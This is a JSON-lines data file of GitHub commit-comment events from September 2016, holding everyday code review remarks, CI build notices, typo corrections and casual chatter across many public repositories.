{"id":"4549746928","type":"CommitCommentEvent","actor":{"login":"Seandor"},"repo":{"name":"Seandor/Think-Angularjs"},"payload":{"comment":{"id":18985899,"position":16,"line":16,"path":"lesson01/src/app.js","commit_id":"b076a10fed5a1f532a798c13b8e1d7a9b3614a4b","created_at":"2016-09-12T14:46:30Z","updated_at":"2016-09-12T14:46:30Z","body":"该函数就属于tight coupling，也就是一次做的事太多了。"}},"created_at":"2016-09-12T14:46:30Z"}
{"id":"4549747646","type":"CommitCommentEvent","actor":{"login":"CheshireCoder8"},"repo":{"name":"CheshireCoder8/TIL"},"payload":{"comment":{"id":18985901,"position":null,"line":null,"path":null,"commit_id":"bfd3c616dd0b76092ed9ba9a0b51ee45f9c6ab2c","created_at":"2016-09-12T14:46:37Z","updated_at":"2016-09-12T14:46:37Z","body":"하하 ㅠㅠ"}},"created_at":"2016-09-12T14:46:37Z"}
{"id":"4549748332","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-howana"},"payload":{"comment":{"id":18985902,"position":null,"line":null,"path":null,"commit_id":"db41773a0a01e4461d50c790b087813eb2d45ea1","created_at":"2016-09-12T14:46:43Z","updated_at":"2016-09-12T14:46:43Z","body":"the fox video is very good. the ping pong ball is good, but it would help to keep the ball in frame the whole shot so you can see the bounces better. \r\n\r\nneeds thumbnail drawings.\r\n"}},"created_at":"2016-09-12T14:46:43Z"}
{"id":"4549749404","type":"CommitCommentEvent","actor":{"login":"noscripter"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18985903,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-12T14:46:52Z","updated_at":"2016-09-12T14:46:52Z","body":"I searched in all my `$HOME/.vim/bundle` and find nothing called `UltiSnips#FileTypeChanged`. Everything is fine after I reset from this commit."}},"created_at":"2016-09-12T14:46:52Z"}
{"id":"4549751167","type":"CommitCommentEvent","actor":{"login":"Devious-Mark"},"repo":{"name":"jessmillar/scratch_fdfr"},"payload":{"comment":{"id":18985906,"position":null,"line":null,"path":null,"commit_id":"dc5d0cef84d0b55f1d6bc36fcd402acdfcc41a35","created_at":"2016-09-12T14:47:10Z","updated_at":"2016-09-12T14:47:10Z","body":"Oh yeah. Also created the vhz producer, talker and contract. Kind of important to mention"}},"created_at":"2016-09-12T14:47:10Z"}
{"id":"4549753239","type":"CommitCommentEvent","actor":{"login":"CheshireCoder8"},"repo":{"name":"ElementalKiss/TIL"},"payload":{"comment":{"id":18985908,"position":null,"line":null,"path":null,"commit_id":"7e1ef3a36805a21173c68b8940a021fcdd06e5a4","created_at":"2016-09-12T14:47:28Z","updated_at":"2016-09-12T14:47:28Z","body":"한국어로 보니까 이렇게 어려운 말일 수가 없네요. 쉬운 영어로 부탁드려요. ^-^"}},"created_at":"2016-09-12T14:47:28Z"}
{"id":"4549757699","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18985916,"position":null,"line":null,"path":null,"commit_id":"40c99ef4beb707725fa3a8b361700577a582bbda","created_at":"2016-09-12T14:48:08Z","updated_at":"2016-09-12T14:48:08Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EOvXwOSfRDqEKuzDNesgDQ"}},"created_at":"2016-09-12T14:48:08Z"}
{"id":"4549758021","type":"CommitCommentEvent","actor":{"login":"p-lambert"},"repo":{"name":"pgt/emacs-dotfiles"},"payload":{"comment":{"id":18985918,"position":5,"line":103,"path":"lisp/init-packages.el","commit_id":"bba924a9da76b83cde6fc515bddeaf5a49995fd9","created_at":"2016-09-12T14:48:11Z","updated_at":"2016-09-12T14:48:11Z","body":"💀 "}},"created_at":"2016-09-12T14:48:11Z"}
{"id":"4549761099","type":"CommitCommentEvent","actor":{"login":"gunasper"},"repo":{"name":"gunasper/docs.stormwind"},"payload":{"comment":{"id":18985923,"position":null,"line":null,"path":null,"commit_id":"2a02f7ab7047ab8ec32ecb3fbddfdd83c5879278","created_at":"2016-09-12T14:48:38Z","updated_at":"2016-09-12T14:48:38Z","body":"__API Description file syntax error on line 192__: base type 'alerts' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-12T14:48:38Z"}
{"id":"4549761310","type":"CommitCommentEvent","actor":{"login":"squiter"},"repo":{"name":"pgt/emacs-dotfiles"},"payload":{"comment":{"id":18985924,"position":null,"line":null,"path":null,"commit_id":"bba924a9da76b83cde6fc515bddeaf5a49995fd9","created_at":"2016-09-12T14:48:39Z","updated_at":"2016-09-12T14:48:39Z","body":":skull: :copyright: :snowflake: "}},"created_at":"2016-09-12T14:48:39Z"}
{"id":"4549762878","type":"CommitCommentEvent","actor":{"login":"kevinpr007"},"repo":{"name":"Ivan-Marquez/stylepoint"},"payload":{"comment":{"id":18985933,"position":5,"line":4,"path":"src/controllers/user.controller.js","commit_id":"96beff1b6b910a643aa399975ff92a96e3fc8008","created_at":"2016-09-12T14:48:54Z","updated_at":"2016-09-12T14:48:54Z","body":"@Ivan-Marquez Do this should be here? I was thinking this should be part of the model. If it's not, then you always need to put a log.info in all the service functions. What do you think?"}},"created_at":"2016-09-12T14:48:54Z"}
{"id":"4549764063","type":"CommitCommentEvent","actor":{"login":"moose4621"},"repo":{"name":"moose4621/Seeder-Controller"},"payload":{"comment":{"id":18985940,"position":null,"line":null,"path":null,"commit_id":"7a2e4fddc30b2646298ff1107387d1befacb86af","created_at":"2016-09-12T14:49:06Z","updated_at":"2016-09-12T14:49:06Z","body":"This version is a simplified master without PID motor control. It uses analogWrite to directly control the esc using the rpm sensor for feedback.\r\n"}},"created_at":"2016-09-12T14:49:06Z"}
{"id":"4549765849","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-Insangineer"},"payload":{"comment":{"id":18985944,"position":null,"line":null,"path":null,"commit_id":"4c2f2e6aeb2d7d2af75866457d5641eca2eb6592","created_at":"2016-09-12T14:49:22Z","updated_at":"2016-09-12T14:49:22Z","body":"These are ok, but better quality video will help you in the animation.\r\n\r\nShoot the videos from further back to keep the balls in frame the whole time. \r\nShoot in brighter light (outdoors in daylight, or other bright light)\r\n\r\nNeeds thumbnail sketches\r\n"}},"created_at":"2016-09-12T14:49:22Z"}
{"id":"4549767234","type":"CommitCommentEvent","actor":{"login":"benfoxall"},"repo":{"name":"omgmog/beatmaker"},"payload":{"comment":{"id":18985948,"position":null,"line":null,"path":null,"commit_id":"ce5122f88cddbfb4ac6c6a1062d301aefe30434a","created_at":"2016-09-12T14:49:34Z","updated_at":"2016-09-12T14:49:34Z","body":"MATHS  💯 🔢 🎱 \r\n:one: :two: :three: :four: :five: :six: :seven: :eight: :nine: :ten: :etc: :bar_chart: :trophy: :boom:"}},"created_at":"2016-09-12T14:49:34Z"}
{"id":"4549768873","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18985957,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T14:49:49Z","updated_at":"2016-09-12T14:49:49Z","body":"Speaking about question views, I'd say:\r\n\r\nIn 2.x:\r\n1. Core views\r\n2. Plugin (should be possible to set: \"use plugin view even if template view overridden available?Yes/No\")\r\n3. Parent template view override \r\n4. Template view override\r\n\r\nWhen question object is available:\r\n1. Plugin (should be possible to set: \"use plugin view even if extended question object? Yes/No\")\r\n2. Question object views (core, or extended)\r\n"}},"created_at":"2016-09-12T14:49:49Z"}
{"id":"4549771128","type":"CommitCommentEvent","actor":{"login":"atoomic"},"repo":{"name":"perl11/cperl"},"payload":{"comment":{"id":18985968,"position":5,"line":810,"path":"Porting/Maintainers.pl","commit_id":"ca167a247f622492331c90914c865ffeecbb9bc4","created_at":"2016-09-12T14:50:12Z","updated_at":"2016-09-12T14:50:12Z","body":"wow really ? lol"}},"created_at":"2016-09-12T14:50:12Z"}
{"id":"4549773741","type":"CommitCommentEvent","actor":{"login":"Seandor"},"repo":{"name":"Seandor/Think-Angularjs"},"payload":{"comment":{"id":18985972,"position":9,"line":9,"path":"lesson01/src/app.js","commit_id":"b076a10fed5a1f532a798c13b8e1d7a9b3614a4b","created_at":"2016-09-12T14:50:34Z","updated_at":"2016-09-12T14:50:34Z","body":"`getElementById('name')`这样属于tight coupling的问题，如果DOM中的id属性改变了，相应的JS中代码也要做出变更。"}},"created_at":"2016-09-12T14:50:34Z"}
{"id":"4549776176","type":"CommitCommentEvent","actor":{"login":"pgt"},"repo":{"name":"pgt/emacs-dotfiles"},"payload":{"comment":{"id":18985976,"position":5,"line":103,"path":"lisp/init-packages.el","commit_id":"bba924a9da76b83cde6fc515bddeaf5a49995fd9","created_at":"2016-09-12T14:50:55Z","updated_at":"2016-09-12T14:50:55Z","body":"😆 "}},"created_at":"2016-09-12T14:50:55Z"}
{"id":"4549784186","type":"CommitCommentEvent","actor":{"login":"jonasmalacofilho"},"repo":{"name":"protocubo/the-online-brt-planning-guide"},"payload":{"comment":{"id":18985991,"position":null,"line":null,"path":null,"commit_id":"5da545a7fae0732fa886e413fcc3722cac214198","created_at":"2016-09-12T14:52:08Z","updated_at":"2016-09-12T14:52:08Z","body":"No worries..."}},"created_at":"2016-09-12T14:52:08Z"}
{"id":"4549785610","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985994,"position":null,"line":null,"path":null,"commit_id":"59c938c7050359d1ec7a7fe769523cc1f6bbc9c4","created_at":"2016-09-12T14:52:21Z","updated_at":"2016-09-12T14:52:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 248](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1204&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:29:29"}},"created_at":"2016-09-12T14:52:21Z"}
{"id":"4549785676","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985995,"position":null,"line":null,"path":null,"commit_id":"807f71ddaedb84f1f4954ec4db9c39e3e8bb4cef","created_at":"2016-09-12T14:52:22Z","updated_at":"2016-09-12T14:52:22Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 249](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1205&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T14:52:22Z"}
{"id":"4549789020","type":"CommitCommentEvent","actor":{"login":"ziahamza"},"repo":{"name":"ziahamza/webui-aria2"},"payload":{"comment":{"id":18986005,"position":null,"line":null,"path":null,"commit_id":"869bc09f17200fb2f585621c19cd44310df2fc7b","created_at":"2016-09-12T14:52:52Z","updated_at":"2016-09-12T14:52:52Z","body":"Oh shoot! Gonna fix this asap "}},"created_at":"2016-09-12T14:52:52Z"}
{"id":"4549794197","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18986017,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T14:53:40Z","updated_at":"2016-09-12T14:53:40Z","body":"So templates should not override question object views?"}},"created_at":"2016-09-12T14:53:40Z"}
{"id":"4549797927","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"eflores0227/sep-assignments"},"payload":{"comment":{"id":18986036,"position":27,"line":27,"path":"02-algorithms/03-sort/bucket_sort.rb","commit_id":"aebc50c654466bfac611b20b3a9b797589730bde","created_at":"2016-09-12T14:54:16Z","updated_at":"2016-09-12T14:54:16Z","body":"You could replace this loop with `array.concat`"}},"created_at":"2016-09-12T14:54:16Z"}
{"id":"4549798778","type":"CommitCommentEvent","actor":{"login":"Ivan-Marquez"},"repo":{"name":"Ivan-Marquez/stylepoint"},"payload":{"comment":{"id":18986038,"position":5,"line":4,"path":"src/controllers/user.controller.js","commit_id":"96beff1b6b910a643aa399975ff92a96e3fc8008","created_at":"2016-09-12T14:54:24Z","updated_at":"2016-09-12T14:54:24Z","body":"@kevinpr007, at model level, we're logging everything related to DB transactions. What you're saying is correct, we'd need to write a `log.info()` on every controller action. But it'll give us all the info related to the request (session, origin etc) which could be useful too."}},"created_at":"2016-09-12T14:54:24Z"}
{"id":"4549799411","type":"CommitCommentEvent","actor":{"login":"eyoung100"},"repo":{"name":"shiznix/unity-gentoo"},"payload":{"comment":{"id":18986041,"position":null,"line":null,"path":null,"commit_id":"ac1208b712cd141b0f8064e741072541f0613870","created_at":"2016-09-12T14:54:29Z","updated_at":"2016-09-12T14:54:29Z","body":"Does this commit replace my Pull request, or are you getting ready to accept it later??"}},"created_at":"2016-09-12T14:54:29Z"}
{"id":"4549806081","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18986052,"position":null,"line":null,"path":null,"commit_id":"b71f5cc4fcb324c84b63dd099d5f9b73cf7c8f38","created_at":"2016-09-12T14:55:33Z","updated_at":"2016-09-12T14:55:33Z","body":"It has bugs (or I see bugs). How to deal with bugs when software not released, yet? Post it here or still use mantis for troubleshoot?\r\n\r\n1) When Settings dialog (or source Properties opened) and application minimized to tray (Hide), closing properties dialog with \"X\" leads me to the tray icon drop. If recording when minimized and close Properties window with \"X\" - tray icon 'freezes' (no one action is executable but still available).\r\n\r\n2) I think, if system tray icon enabled, application should always minimize to tray (on 'minimize window' and on 'hide to tray' commands). It's ease the  use of the application (for me at least)."}},"created_at":"2016-09-12T14:55:33Z"}
{"id":"4549808795","type":"CommitCommentEvent","actor":{"login":"ikeydoherty"},"repo":{"name":"solus-project/budgie-desktop"},"payload":{"comment":{"id":18986060,"position":null,"line":null,"path":null,"commit_id":"2c69a58307f5234cbfee6cb377961c2c41bd8e01","created_at":"2016-09-12T14:55:56Z","updated_at":"2016-09-12T14:55:56Z","body":"Needs another fix. The GtkAllocation changes for absolutely no reason making the subsequent show off by one whole unit..."}},"created_at":"2016-09-12T14:55:56Z"}
{"id":"4549814537","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18986078,"position":91,"line":69,"path":"login.html","commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-12T14:56:51Z","updated_at":"2016-09-12T14:56:51Z","body":"does the function make sense? because i wasn't sure how to use it... @rickyc "}},"created_at":"2016-09-12T14:56:51Z"}
{"id":"4549814685","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18986079,"position":null,"line":null,"path":null,"commit_id":"510bb28f0a7b4830a50bdf919b3c5796110464a5","created_at":"2016-09-12T14:56:53Z","updated_at":"2016-09-12T14:56:53Z","body":"When I did something like this a few months ago you suggested we modify it upstream :-p\r\nThis being said, we should move (in the long term) to the PHP SOAP class. I don't think NuSOAP is maintained by anyone anymore."}},"created_at":"2016-09-12T14:56:53Z"}
{"id":"4549816031","type":"CommitCommentEvent","actor":{"login":"socketpair"},"repo":{"name":"python/asyncio"},"payload":{"comment":{"id":18986085,"position":6,"line":44,"path":"asyncio/selector_events.py","commit_id":"bea3a4247a450be7fb82dec111429bb2752aac4d","created_at":"2016-09-12T14:57:08Z","updated_at":"2016-09-12T14:57:08Z","body":"I'm stopping this demagogy. Just change please. :)"}},"created_at":"2016-09-12T14:57:08Z"}
{"id":"4549821128","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18986099,"position":91,"line":69,"path":"login.html","commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-12T14:57:56Z","updated_at":"2016-09-12T14:57:56Z","body":"Yes, the idea of the function makes sense. There's a few problems with it though. Read the comments I made on the PR about scoping."}},"created_at":"2016-09-12T14:57:56Z"}
{"id":"4549823323","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18986108,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T14:58:18Z","updated_at":"2016-09-12T14:58:18Z","body":"question override was just a simple feature to show what was possible to do now, and to provide a quick way for user to modify that HTML code.\r\n\r\nOnce we have a clean way to do it (uploading new question object inheriting from the core one), it will not needed anymore. If we go that way, people who created custom views for their templates will be able in a very easy way to push those view to new question objects (but also their js workaround, etc). "}},"created_at":"2016-09-12T14:58:18Z"}
{"id":"4549823965","type":"CommitCommentEvent","actor":{"login":"aftermeal93"},"repo":{"name":"aftermeal93/DGG-Project"},"payload":{"comment":{"id":18986111,"position":null,"line":null,"path":null,"commit_id":"59d11e07e3f5f53226d8b2cfc84215d7cc75fa21","created_at":"2016-09-12T14:58:24Z","updated_at":"2016-09-12T14:58:24Z","body":"kkk"}},"created_at":"2016-09-12T14:58:24Z"}
{"id":"4549827376","type":"CommitCommentEvent","actor":{"login":"nivelle"},"repo":{"name":"nivelle/StudyPlan"},"payload":{"comment":{"id":18986121,"position":null,"line":null,"path":null,"commit_id":"6026e0417606705448855468fd02dea1a4cb2fd6","created_at":"2016-09-12T14:58:55Z","updated_at":"2016-09-12T14:58:55Z","body":"test"}},"created_at":"2016-09-12T14:58:55Z"}
{"id":"4549830471","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18986126,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T14:59:25Z","updated_at":"2016-09-12T14:59:25Z","body":"I thought that's the magic. 😄 "}},"created_at":"2016-09-12T14:59:25Z"}
{"id":"4549834279","type":"CommitCommentEvent","actor":{"login":"moose4621"},"repo":{"name":"moose4621/Seeder-Controller"},"payload":{"comment":{"id":18986133,"position":null,"line":null,"path":null,"commit_id":"7a2e4fddc30b2646298ff1107387d1befacb86af","created_at":"2016-09-12T15:00:01Z","updated_at":"2016-09-12T15:00:01Z","body":"The \"Master\" is the unit mounted on the machine which controls the motor and height switch.\r\nThe \"client\" is the remote hand controller."}},"created_at":"2016-09-12T15:00:01Z"}
{"id":"4549835269","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":18986136,"position":null,"line":null,"path":null,"commit_id":"ec7a64476cad7d457e62209d9c4fa626108d5d19","created_at":"2016-09-12T15:00:13Z","updated_at":"2016-09-12T15:00:13Z","body":"Hi VoyagerOne. Without adapting the ceiling value 324 now updates at depth 17 will be without effect. Is that intended by you?"}},"created_at":"2016-09-12T15:00:13Z"}
{"id":"4549839739","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18986149,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T15:00:53Z","updated_at":"2016-09-12T15:00:53Z","body":"I'm not convinced. What if a user want to provide a Foundation CSS with his/hers template? Then the user would have to provide question object types instead of just a template with view files."}},"created_at":"2016-09-12T15:00:53Z"}
{"id":"4549844144","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18986155,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T15:01:35Z","updated_at":"2016-09-12T15:01:35Z","body":"And: Question objects assume PHP code."}},"created_at":"2016-09-12T15:01:35Z"}
{"id":"4549845918","type":"CommitCommentEvent","actor":{"login":"vomikan"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":18986160,"position":6,"line":27,"path":"src/model/Model_Attachment.cpp","commit_id":"6edafb7e34287940e215921e4073c25ea854fde9","created_at":"2016-09-12T15:01:50Z","updated_at":"2016-09-12T15:01:50Z","body":"@gabriele-v please advice here"}},"created_at":"2016-09-12T15:01:50Z"}
{"id":"4549847475","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18986162,"position":null,"line":null,"path":null,"commit_id":"fc89d6edd9d0ddc0fd035a47c62a060fb94a55d7","created_at":"2016-09-12T15:02:05Z","updated_at":"2016-09-12T15:02:05Z","body":"|`js/js.libraries/src/core/collections/LinkedHashMap.kt:55`|\n|---|\nRewritten with local variables."}},"created_at":"2016-09-12T15:02:05Z"}
{"id":"4549858119","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":18986184,"position":null,"line":null,"path":null,"commit_id":"8dc1a870973e20011282059ba124838cdd120dd3","created_at":"2016-09-12T15:03:47Z","updated_at":"2016-09-12T15:03:47Z","body":"yes it works much better, thanks."}},"created_at":"2016-09-12T15:03:47Z"}
{"id":"4549859272","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":18986188,"position":null,"line":null,"path":null,"commit_id":"1d2d37f1aa37e089c23e44e14916864d1d809cba","created_at":"2016-09-12T15:03:54Z","updated_at":"2016-09-12T15:03:54Z","body":"Note to self: when we make a `_to_4.7.0.php` update file, move these files programmatically, but remember to bail gracefully if they aren't readable/writeable."}},"created_at":"2016-09-12T15:03:54Z"}
{"id":"4549871493","type":"CommitCommentEvent","actor":{"login":"Ruspetrol"},"repo":{"name":"Ruspetrol/gazprom"},"payload":{"comment":{"id":18986220,"position":1,"line":1,"path":"one.txt","commit_id":"b71aceafb1de49b076db6bdbaf6cb006b7fcf980","created_at":"2016-09-12T15:05:49Z","updated_at":"2016-09-12T15:05:49Z","body":"qqq"}},"created_at":"2016-09-12T15:05:49Z"}
{"id":"4549874366","type":"CommitCommentEvent","actor":{"login":"realill"},"repo":{"name":"yifan/asr-server"},"payload":{"comment":{"id":18986228,"position":null,"line":null,"path":null,"commit_id":"36ae5085124d46ff7b7826120c81459ea8186750","created_at":"2016-09-12T15:06:19Z","updated_at":"2016-09-12T15:06:19Z","body":"I see you are doing a lot of improvements here. I just want to say, that we are open for pull requests."}},"created_at":"2016-09-12T15:06:19Z"}
{"id":"4549876830","type":"CommitCommentEvent","actor":{"login":"misterzik"},"repo":{"name":"Awesome-Support/Awesome-Support"},"payload":{"comment":{"id":18986235,"position":null,"line":null,"path":null,"commit_id":"14a66a1195f6f305bd0ff68f7fa50cad60af8bc4","created_at":"2016-09-12T15:06:41Z","updated_at":"2016-09-12T15:06:41Z","body":"Thanks a lot \\m/ was driving me crazy, are you guys rolling this update any time soon? @julien731 "}},"created_at":"2016-09-12T15:06:41Z"}
{"id":"4549879317","type":"CommitCommentEvent","actor":{"login":"BojanaDM"},"repo":{"name":"BojanaDM/hello-world"},"payload":{"comment":{"id":18986239,"position":null,"line":null,"path":null,"commit_id":"8e7b7513ee767f91f1099eb255024f6dbb514788","created_at":"2016-09-12T15:07:06Z","updated_at":"2016-09-12T15:07:06Z","body":"ovo je to?"}},"created_at":"2016-09-12T15:07:06Z"}
{"id":"4549887921","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-uyenuong"},"payload":{"comment":{"id":18986260,"position":null,"line":null,"path":null,"commit_id":"1804ac08429ba3f1b2d228e7145f92db273cd7ac","created_at":"2016-09-12T15:08:25Z","updated_at":"2016-09-12T15:08:25Z","body":"Videos and sketches look pretty good.  The clementine will be interesting since it's non-spherical, so make sure you pay close attention to how it moves.  On both, make sure you're taking notes/thumbnails on the spacing in addition to the timing.  "}},"created_at":"2016-09-12T15:08:25Z"}
{"id":"4549889106","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18986261,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T15:08:37Z","updated_at":"2016-09-12T15:08:37Z","body":"@sndnvaps check latest changes here https://github.com/aosp-msm8960"}},"created_at":"2016-09-12T15:08:37Z"}
{"id":"4549893828","type":"CommitCommentEvent","actor":{"login":"Wolgo"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18986275,"position":null,"line":null,"path":null,"commit_id":"6733b4ccd2a32ce45f6d4580f145d1a66977853a","created_at":"2016-09-12T15:09:21Z","updated_at":"2016-09-12T15:09:21Z","body":"No clue while this fails, going to revert to try and fix it.\r\n"}},"created_at":"2016-09-12T15:09:21Z"}
{"id":"4549898402","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":18986286,"position":null,"line":null,"path":null,"commit_id":"55c087e64144cf3ae1077a23373d933920d9a5e1","created_at":"2016-09-12T15:10:07Z","updated_at":"2016-09-12T15:10:07Z","body":"This should prove a useful feature. It allows users to view the entire manifest (with previews of the graphics) and displays information on each entry. In the future (near future, like later this week), users will be able to remove entries and edit the info, so managing manifest files will be easier than before."}},"created_at":"2016-09-12T15:10:07Z"}
{"id":"4549901139","type":"CommitCommentEvent","actor":{"login":"maierfelix"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18986287,"position":null,"line":null,"path":null,"commit_id":"6a983bc8bec2f81063f2b4f40dd4ca0a5820ab34","created_at":"2016-09-12T15:10:32Z","updated_at":"2016-09-12T15:10:32Z","body":"Done in https://github.com/maierfelix/POGOserver/commit/0eb318debc3131698bdb26489a4a01a2fbf62d50\r\nPokedex will be extended within the next commits"}},"created_at":"2016-09-12T15:10:32Z"}
{"id":"4549901179","type":"CommitCommentEvent","actor":{"login":"mariagwyn"},"repo":{"name":"acquia/blt"},"payload":{"comment":{"id":18986288,"position":null,"line":null,"path":null,"commit_id":"83ca9a391853c4a1c685fdb0b07d239124ecbd92","created_at":"2016-09-12T15:10:33Z","updated_at":"2016-09-12T15:10:33Z","body":"Are these changes only to local-related files? I don't have my repo open right now, but I was pretty sure there are necessary changes to settings.php. This is not just a local site issue. \r\n\r\nAlso, shouldn't the documentation for $site_dir require that it be set in settings.php not blt.settings.php which is controlled by vendor and can't be directly edited?"}},"created_at":"2016-09-12T15:10:33Z"}
{"id":"4549901962","type":"CommitCommentEvent","actor":{"login":"TRox1972"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18986290,"position":5,"line":58,"path":".github/ISSUE_TEMPLATE_tmpl.md","commit_id":"546edb2efabb18f9eb0eecb2f8719fcb777e99a7","created_at":"2016-09-12T15:10:40Z","updated_at":"2016-09-12T15:10:40Z","body":"'an' should be removed"}},"created_at":"2016-09-12T15:10:40Z"}
{"id":"4549911906","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18986319,"position":5,"line":42,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"fb3f03b4462b9a371687394986448f3137294321","created_at":"2016-09-12T15:12:19Z","updated_at":"2016-09-12T15:12:19Z","body":"This comment doesn't make a whole lot of sense to me, especially if you're just looking at the setMetaDataEntry function. "}},"created_at":"2016-09-12T15:12:19Z"}
{"id":"4549915467","type":"CommitCommentEvent","actor":{"login":"kroniak"},"repo":{"name":"tmenier/Flurl"},"payload":{"comment":{"id":18986329,"position":11,"line":21,"path":"PackageTesters/PackageTester.Shared/Tester.cs","commit_id":"834df5126aa855c05f50d4a96fc5cf4b97dfa3a5","created_at":"2016-09-12T15:12:52Z","updated_at":"2016-09-12T15:12:52Z","body":"The bug is in package dependicies, not in code. TestProject can tests only code, not full package. "}},"created_at":"2016-09-12T15:12:52Z"}
{"id":"4549916730","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986330,"position":28,"line":169,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:13:04Z","updated_at":"2016-09-12T15:13:04Z","body":"it's -> its"}},"created_at":"2016-09-12T15:13:04Z"}
{"id":"4549917188","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18986333,"position":null,"line":null,"path":null,"commit_id":"5c6bcee944a3c03b0c0274a9e91e0c61b6bd5b33","created_at":"2016-09-12T15:13:10Z","updated_at":"2016-09-12T15:13:10Z","body":"Any plans to backport this to release-16.09?"}},"created_at":"2016-09-12T15:13:10Z"}
{"id":"4549918528","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986338,"position":30,"line":171,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:13:23Z","updated_at":"2016-09-12T15:13:23Z","body":"defined *by the* ``with``"}},"created_at":"2016-09-12T15:13:23Z"}
